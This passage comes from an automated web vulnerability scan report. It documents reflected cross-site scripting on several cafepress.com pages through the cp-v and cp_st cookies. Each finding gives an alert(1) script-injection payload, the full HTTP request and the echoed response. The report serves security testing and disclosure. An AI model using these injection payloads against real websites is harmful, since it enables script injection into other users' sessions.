Set-Cookie: cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:55 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '144cb</script><script>alert(1)</script>4632a294b1c'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.22. http://www.cafepress.com/+buttons [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+buttons

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e64e3"-alert(1)-"4f4360aac81 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+buttons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAe64e3"-alert(1)-"4f4360aac81; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 59646
Date: Sun, 26 Dec 2010 13:48:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/
Set-Cookie: cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAe64e3"-alert(1)-"4f4360aac81";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.23. http://www.cafepress.com/+buttons [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+buttons

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49536</script><script>alert(1)</script>00786d92ac was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+buttons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=49536</script><script>alert(1)</script>00786d92ac; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 59667
Date: Sun, 26 Dec 2010 13:48:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:52 GMT; path=/
Set-Cookie: cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:52 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '49536</script><script>alert(1)</script>00786d92ac'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.24. http://www.cafepress.com/+calendars [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+calendars

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f773c"-alert(1)-"fa99a9758e1 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+calendars HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAf773c"-alert(1)-"fa99a9758e1; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 57747
Date: Sun, 26 Dec 2010 13:49:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/
Set-Cookie: cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 57747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAf773c"-alert(1)-"fa99a9758e1";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.25. http://www.cafepress.com/+calendars [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+calendars

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 673c2</script><script>alert(1)</script>81eee94446c was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+calendars HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=673c2</script><script>alert(1)</script>81eee94446c; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 57764
Date: Sun, 26 Dec 2010 13:49:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:13 GMT; path=/
Set-Cookie: cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:13 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 57764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '673c2</script><script>alert(1)</script>81eee94446c'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.26. http://www.cafepress.com/+clocks [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+clocks

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 405f7"-alert(1)-"c5d27bb0659 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+clocks HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA405f7"-alert(1)-"c5d27bb0659; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 59340
Date: Sun, 26 Dec 2010 13:48:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/
Set-Cookie: cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA405f7"-alert(1)-"c5d27bb0659";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.27. http://www.cafepress.com/+clocks [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+clocks

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56c87</script><script>alert(1)</script>eb1ed059733 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+clocks HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
